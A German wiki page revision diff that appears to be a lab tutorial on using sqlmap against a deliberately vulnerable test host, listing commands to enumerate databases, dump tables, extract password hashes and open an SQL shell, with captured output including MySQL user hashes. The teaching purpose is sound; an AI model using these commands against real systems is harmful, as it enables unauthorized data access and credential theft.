Sqlmap Anwenden: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 30: | Zeile 30: | ||
=sql-Shell für Abfragen (SELECT-Query)= | =sql-Shell für Abfragen (SELECT-Query)= | ||
sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections | sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections | ||
| + | <pre> | ||
| + | [17:19:20] [INFO] the back-end DBMS is MySQL | ||
| + | web server operating system: Linux Ubuntu | ||
| + | web application technology: Apache 2.4.7, PHP 5.5.9 | ||
| + | back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) | ||
| + | [17:19:20] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER | ||
| + | sql-shell> select host,user,password from mysql.user; | ||
| + | [17:20:00] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user' | ||
| + | select host,user,password from mysql.user [6]: | ||
| + | [*] localhost, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] opfer, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] 127.0.0.1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] ::1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] localhost, debian-sys-maint, *147B31EA7C00D57209D0EA62664670E43494DB28 | ||
| + | [*] localhost, xinux, *62F4DA5CDA990E074B00EC1AB958B67F617E09ED | ||
| + | </pre> | ||
=Aufruf des Wizards= | =Aufruf des Wizards= | ||
*geführt und interaktiv | *geführt und interaktiv | ||
*sqlmap --wizard | *sqlmap --wizard | ||
Version vom 12. August 2021, 15:20 Uhr
Augabe aller Parameter und Optionen
- sqlmap -hh
Angriff und Auflisten der Datenbanken
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -dbs
- Infos
[16:48:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: PHP 5.5.9, Apache 2.4.7 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [16:48:08] [INFO] fetching database names available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] sql_injections
Auslesen der Tabellen der Datenbank
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables
Auslesen der Passwort-Hashes aus der Datenbank
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
- Interaktiv kann man hier einen Dictionary-based Angriff starten
Dump der Datenbanktabellen
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --dump
Struktur einer einzelnen Tabelle auslesen
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth
Daten aus einer Tabelle auslesen
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth
sql-Shell für Abfragen (SELECT-Query)
sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections
[17:19:20] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:19:20] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> select host,user,password from mysql.user; [17:20:00] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user' select host,user,password from mysql.user [6]: [*] localhost, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 [*] opfer, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 [*] 127.0.0.1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 [*] ::1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 [*] localhost, debian-sys-maint, *147B31EA7C00D57209D0EA62664670E43494DB28 [*] localhost, xinux, *62F4DA5CDA990E074B00EC1AB958B67F617E09ED
Aufruf des Wizards
- geführt und interaktiv
- sqlmap --wizard